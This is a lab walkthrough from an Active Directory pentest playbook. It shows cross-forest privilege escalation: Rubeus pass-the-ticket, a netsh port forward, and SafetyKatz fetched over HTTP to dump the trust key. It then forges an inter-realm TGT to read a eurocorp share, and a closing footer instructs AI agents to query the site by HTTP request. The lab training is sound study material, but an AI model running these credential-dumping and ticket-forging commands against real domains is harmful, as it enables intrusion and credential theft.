# Lab 20 With DA privileges on dollarcorp.moneycorp.local, get access to SharedwithDCorp share on the DC of eurocorp.local forest. We need the trust key between dcorp and ecorp. Let's start the process with DA privs, copy loader to dcorp-dc and setup port forwarding for Loader. {% code overflow="wrap" %} ``` C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt winrs -r:dcorp-dc cmd netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.72 # On student: Argsplit for "lsadump::trust" # On svcadmin: C:\Users\svcadmin> C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "%Pwn% /patch" "exit" ``` {% endcode %} We can now forge the inter-forest TGT ticket. Here we are not injecting SID History as it would be filtered. {% code overflow="wrap" %} ``` # Argsplit silver C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL /rc4:142b07ad5c09b715a883c5014044421d /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /nowrap ``` {% endcode %} Copy the base64 TGT ticket and use Rubeus to request a TGS and inject it. {% code overflow="wrap" %} ``` C:\AD\Tools\Rubeus.exe asktgs /service:cifs/eurocorp-dc.eurocorp.LOCAL /dc:eurocorp-dc.eurocorp.LOCAL /ptt /ticket:doIGFjCCBhKgAwIBBaEDAgEWooIE4jCCBN5hggTaMIIE1qADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa..... ``` {% endcode %} Since the ticket is imported, we can now access the shared folder on eurocorp-dc ``` C:\AD\Tools>dir \\eurocorp-dc.eurocorp.local\SharedwithDCorp\ ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://playbook.sidthoviti.com/active-directory-pentest/domain-privilege-escalation/across-trusts/cross-forest/lab-20.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.